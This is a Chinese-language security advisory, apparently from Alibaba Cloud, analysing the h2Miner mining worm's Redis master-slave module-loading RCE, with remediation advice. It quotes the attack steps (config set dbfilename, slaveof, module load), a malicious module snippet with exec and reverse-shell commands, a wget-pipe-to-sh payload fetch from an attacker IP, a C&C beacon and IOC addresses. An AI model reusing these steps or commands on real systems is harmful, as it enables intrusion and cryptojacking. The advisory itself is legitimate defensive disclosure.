威脅快報|Redis RCE導緻h2Miner蠕蟲新一輪爆發，建議使用者及時排查以防事态更新

概述

近日，阿裡雲安全團隊監測到h2Miner挖礦僵屍網絡蠕蟲的一波突然爆發，其利用Redis未授權或弱密碼作為入口，使用主從同步的方式從惡意伺服器上同步惡意module，之後在目标機器上加載此惡意module并執行惡意指令。

在以往常見的攻擊者或蠕蟲中，其大多都沿用登陸redis後寫入定時任務或寫ssh key的方式進行入侵，這種方式受權限與系統類型影響并不一定能夠成功。而此次使用redis加載module的攻擊方式，可以直接執行任意指令或拿到shell互動環境，危害極大。

由于全網redis近百萬台的數量，是以阿裡雲安全團隊建議使用者盡量不要将redis服務暴露在公網，及時排查相關弱密碼問題及是否受蠕蟲影響，必要時可考慮選用安全産品幫助保障安全。

背景

h2Miner團夥

h2Miner是一個linux下的挖礦僵屍網絡，通過hadoop yarn未授權、docker未授權、confluence RCE、thinkphp5RCE、Redis未授權等多種手段進行入侵，下載下傳惡意腳本及惡意程式進行挖礦牟利，橫向掃描擴大攻擊面并維持C&C通信。

Redis RCE

此利用方式由Pavel Toporkov在zeronights 2018上分享，在Redis 4.x之後，Redis新增了Module功能，使用者可以在Redis中加載由C語言編譯而成的so檔案，進而實作特定的Redis指令。而在Redis主從模式下，可以通過FULLRESYNC同步檔案到從機上，進而完成惡意so檔案的傳輸。傳輸完成後在目标機Redis上進行Module加載，便可執行任意指令。

蠕蟲分析

近日，阿裡雲安全團隊發現h2Miner團夥規模突然急劇上升，在短短幾日所影響的主機數量翻了一個數量級，阿裡雲安全團隊在第一時間進行了響應。根據分析，整體的攻擊鍊路如下圖：

攻擊鍊路

h2miner主要使用Redis RCE的方式來完成入侵，首先利用Redis未授權或弱密碼擷取Redis登入權限，之後利用使用config set dbfilename red2.so來修改儲存檔案名，之後使用salveof指令設定主從複制的主機位址。當目标Redis服務與攻擊者所有的惡意Redis服務建立主從連接配接關系後，攻擊者控制惡意Redis發送FULLRESYNC進行檔案同步，同步的結果會在目标Redis上寫入red2.so檔案，進而完成了惡意so檔案的傳輸。在此之後，攻擊者利用module load ./red2.so加載此so檔案，此子產品根據傳入的參數可以執行任意指令或發起反向連接配接擷取shell環境。

if (RedisModule_CreateCommand(ctx, "system.exec",
        DoCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
        return REDISMODULE_ERR;
      if (RedisModule_CreateCommand(ctx, "system.rev",
        RevShellCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
        return REDISMODULE_ERR;           

在執行類似/bin/sh -c wget -q -O -

http://195.3.146.118/unk.sh

| sh > /dev/null 2>&1的惡意指令之後，攻擊者會将的檔案名恢複為預設的，并使用module unload解除安裝system子產品的加載，進而清理相應的痕迹。但依舊在被攻擊主機上殘留有red2.so檔案，建議使用者關注自身Redis服務目錄下是否有此可疑檔案。

跟進其使用的惡意腳本，除了殺死一些惡意程序以搶奪資源之外，會向

http://142.44.191.122/kinsing

下載下傳惡意二進制檔案并運作，是以主機中包含kinsing的程序或目錄可能代表此機器已被該蠕蟲"光臨"。

根據簡單的逆向分析結果顯示，該惡意程式主要有以下功能：

• 下載下傳檔案并執行
• 執行挖礦程式
• 維持C&C通信并執行指令
• 利用masscan對外掃描以擴大影響面

惡意程式函數清單

除此之外，惡意程式中内置了C&C伺服器ip位址，受影響的主機會以http的方式與C&C通信伺服器進行通信，其中殭屍電腦的資訊在http頭部中辨別。

内置C&C伺服器

GET /h HTTP/1.1
Host: 91.215.169.111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Arch: amd64
Cores: 2
Mem: 3944
Os: linux
Osname: debian
Osversion: 10.0
Root: false
S: k
Uuid: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx
Version: 26
Accept-Encoding: gzip           

其他攻擊方式

IOC

/kinsing

142.44.191.122/t.sh

185.92.74.42/h.sh

142.44.191.122/spr.sh

142.44.191.122/spre.sh

195.3.146.118/unk.sh

c&c

45.10.88.102

91.215.169.111

139.99.50.255

46.243.253.167

195.123.220.193

安全建議

1. Redis 非必要情況不要暴露在公網，使用足夠強壯的Redis密碼；
2. 排查Redis路徑下是否殘留red2.so檔案，查詢主機上是有否包含有kinsing的檔案或程序，以确認是否被此蠕蟲感染；
3. 建議使用阿裡雲安全的下一代雲防火牆産品，其阻斷惡意外聯、能夠配置智能政策的功能，能夠有效幫助防禦入侵。哪怕攻擊者在主機上的隐藏手段再高明，下載下傳、挖礦、反彈shell這些操作，都需要進行惡意外聯；雲防火牆的攔截将徹底阻斷攻擊鍊。此外，使用者還可以通過自定義政策，直接屏蔽惡意網站，達到阻斷入侵的目的。此外，雲防火牆獨有的虛拟更新檔功能，能夠幫助客戶更靈活、更“無感”地阻斷攻擊；
4. 對于有更高定制化要求的使用者，可以考慮使用阿裡雲安全管家服務。購買服務後将有經驗豐富的安全專家提供咨詢服務，定制适合您的方案，幫助加強系統，預防入侵。入侵事件發生後，也可介入直接協助入侵後的清理、事件溯源等，适合有較高安全需求的使用者，或未雇傭安全工程師，但希望保障系統安全的企業。

本文作者: 蒼珀

緻謝：桑铎